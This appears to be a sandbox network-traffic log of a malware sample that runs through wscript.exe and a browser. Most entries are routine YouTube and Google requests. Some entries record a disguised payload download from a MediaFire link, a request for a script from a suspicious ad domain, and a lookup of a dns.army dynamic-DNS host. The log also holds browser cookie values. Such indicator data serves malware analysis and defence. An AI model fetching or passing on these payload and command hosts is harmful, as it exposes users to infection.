user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/webcomponents-sd.vflset/webcomponents-sd.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/intersection-observer.min.vflset/intersection-observer.min.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/scheduler.vflset/scheduler.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/scheduler.vflset/scheduler.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/www-tampering.vflset/www-tampering.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/www-tampering.vflset/www-tampering.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/spf.vflset/spf.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/spf.vflset/spf.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/network.vflset/network.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/network.vflset/network.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-main-desktop-home-page-skeleton.css

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/cssbin/www-main-desktop-home-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-onepick.css

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/cssbin/www-onepick.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.CsHs8scMMtg.L.B1.O/am=AACCBA/d=0/br=1/rs=AGKMywFhf542l67Xb-Ga16Te278BjvrbGA

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.CsHs8scMMtg.L.B1.O/am=AACCBA/d=0/br=1/rs=AGKMywFhf542l67Xb-Ga16Te278BjvrbGA HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-main-desktop-watch-page-skeleton.css

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
DNS

13.59.243.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.59.243.192.in-addr.arpa

IN PTR

Response
DNS

i.ytimg.com

msedge.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

216.58.201.118

i.ytimg.com

IN A

142.250.200.54

i.ytimg.com

IN A

172.217.169.22

i.ytimg.com

IN A

216.58.213.22

i.ytimg.com

IN A

142.250.200.22

i.ytimg.com

IN A

142.250.187.246

i.ytimg.com

IN A

216.58.212.246

i.ytimg.com

IN A

142.250.187.214

i.ytimg.com

IN A

142.250.178.22

i.ytimg.com

IN A

172.217.169.54

i.ytimg.com

IN A

172.217.16.246

i.ytimg.com

IN A

216.58.204.86

i.ytimg.com

IN A

142.250.180.22

i.ytimg.com

IN A

142.250.179.246
GET

https://i.ytimg.com/generate_204

msedge.exe

Remote address:

216.58.201.118:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

74.125.71.84
GET

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

msedge.exe

Remote address:

74.125.71.84:443

Request

GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

118.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.201.58.216.in-addr.arpa

IN PTR

Response

118.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f221e100net

118.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f22�I

118.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f118�I
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f101e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f74�H
DNS

84.71.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.71.125.74.in-addr.arpa

IN PTR

Response

84.71.125.74.in-addr.arpa

IN PTR

wn-in-f841e100net
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.169.36
GET

https://www.google.com/js/th/Nah9UXLmpETh3cZd5s9jkmhwr1LJoEjkklvCdqmvRdQ.js

msedge.exe

Remote address:

172.217.169.36:443

Request

GET /js/th/Nah9UXLmpETh3cZd5s9jkmhwr1LJoEjkklvCdqmvRdQ.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

3.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.180.250.142.in-addr.arpa

IN PTR

Response

3.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f31e100net
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.187.206
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A
DNS

youtube.com

msedge.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.212.206
GET

https://youtube.com/

msedge.exe

Remote address:

216.58.212.206:443

Request

GET / HTTP/2.0
host: youtube.com
pragma: no-cache
cache-control: no-cache
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.youtube.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

206.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.212.58.216.in-addr.arpa

IN PTR

Response

206.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f2061e100net

206.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f14�J

206.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f14�J
DNS

206.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.212.58.216.in-addr.arpa

IN PTR
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.250.187.206:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

jnn-pa.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN A

Response

jnn-pa.googleapis.com

IN A

172.217.16.234

jnn-pa.googleapis.com

IN A

216.58.201.106

jnn-pa.googleapis.com

IN A

216.58.213.10

jnn-pa.googleapis.com

IN A

142.250.178.10

jnn-pa.googleapis.com

IN A

142.250.187.202

jnn-pa.googleapis.com

IN A

172.217.169.74

jnn-pa.googleapis.com

IN A

216.58.212.202

jnn-pa.googleapis.com

IN A

142.250.187.234

jnn-pa.googleapis.com

IN A

172.217.169.42

jnn-pa.googleapis.com

IN A

142.250.179.234

jnn-pa.googleapis.com

IN A

172.217.169.10

jnn-pa.googleapis.com

IN A

142.250.180.10

jnn-pa.googleapis.com

IN A

216.58.204.74

jnn-pa.googleapis.com

IN A

142.250.200.10

jnn-pa.googleapis.com

IN A

142.250.200.42
OPTIONS

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

msedge.exe

Remote address:

172.217.16.234:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

206.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

234.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f10�I
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response

172.217.169.36:80

http://www.google.com/

http

wscript.exe

1.1kB
40.9kB
20
33

HTTP Request

GET http://www.google.com/

HTTP Response

200
104.17.151.117:443

https://www.mediafire.com/view/6rgzengdbh7mga3/Background.jpg/file

tls, http

wscript.exe

2.1kB
69.7kB
35
62

HTTP Request

GET https://www.mediafire.com/view/6rgzengdbh7mga3/Background.jpg/file

HTTP Response

200
192.243.59.13:443

https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js

tls, http

msedge.exe

1.8kB
4.5kB
11
13

HTTP Request

GET https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js

HTTP Response

403
216.58.204.78:80

http://www.youtube.com/

http

msedge.exe

953 B
745 B
11
8

HTTP Request

GET http://www.youtube.com/

HTTP Response

301
216.58.204.78:80

www.youtube.com

msedge.exe

420 B
288 B
9
6
216.58.204.78:443

https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-main-desktop-watch-page-skeleton.css

tls, http2

msedge.exe

59.7kB
2.0MB
1022
1470

HTTP Request

GET https://www.youtube.com/

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/desktop_polymer.vflset/desktop_polymer.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/webcomponents-sd.vflset/webcomponents-sd.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/intersection-observer.min.vflset/intersection-observer.min.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/scheduler.vflset/scheduler.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/www-tampering.vflset/www-tampering.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/spf.vflset/spf.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/jsbin/network.vflset/network.js

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-main-desktop-home-page-skeleton.css

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-onepick.css

HTTP Request

GET https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.CsHs8scMMtg.L.B1.O/am=AACCBA/d=0/br=1/rs=AGKMywFhf542l67Xb-Ga16Te278BjvrbGA

HTTP Request

GET https://www.youtube.com/s/desktop/d7bac1f2/cssbin/www-main-desktop-watch-page-skeleton.css
216.58.201.118:443

https://i.ytimg.com/generate_204

tls, http2

msedge.exe

1.9kB
6.4kB
17
14

HTTP Request

GET https://i.ytimg.com/generate_204
74.125.71.84:443

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

tls, http2

msedge.exe

3.0kB
7.6kB
20
18

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en
172.217.169.36:443

https://www.google.com/js/th/Nah9UXLmpETh3cZd5s9jkmhwr1LJoEjkklvCdqmvRdQ.js

tls, http2

msedge.exe

2.7kB
28.7kB
34
33

HTTP Request

GET https://www.google.com/js/th/Nah9UXLmpETh3cZd5s9jkmhwr1LJoEjkklvCdqmvRdQ.js
216.58.212.206:443

https://youtube.com/

tls, http2

msedge.exe

2.0kB
9.5kB
18
19

HTTP Request

GET https://youtube.com/
142.250.187.206:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.8kB
8.3kB
16
17

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
172.217.16.234:443

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

tls, http2

msedge.exe

2.5kB
6.9kB
19
19

HTTP Request

OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

8.8.8.8:53

www.google.com

dns

msedge.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

172.217.169.36
8.8.8.8:53

www.mediafire.com

dns

wscript.exe

63 B
95 B
1
1

DNS Request

www.mediafire.com

DNS Response

104.17.151.117

104.17.150.117
8.8.8.8:53

98.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

98.209.201.84.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

117.151.17.104.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

117.151.17.104.in-addr.arpa
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

167.57.26.184.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

167.57.26.184.in-addr.arpa
8.8.8.8:53

languishcharmingwidely.com

dns

msedge.exe

72 B
232 B
1
1

DNS Request

languishcharmingwidely.com

DNS Response

192.243.59.13

192.243.61.227

172.240.108.76

192.243.61.225

172.240.127.234

192.243.59.20

192.243.59.12

172.240.253.132

172.240.108.84

172.240.108.68
8.8.8.8:53

www.msnsndstdyyemkemafgk.dns.army

dns

msedge.exe

79 B
79 B
1
1

DNS Request

www.msnsndstdyyemkemafgk.dns.army
8.8.8.8:53

www.youtube.com

dns

msedge.exe

61 B
319 B
1
1

DNS Request

www.youtube.com

DNS Response

216.58.204.78

172.217.16.238

142.250.178.14

142.250.200.14

142.250.200.46
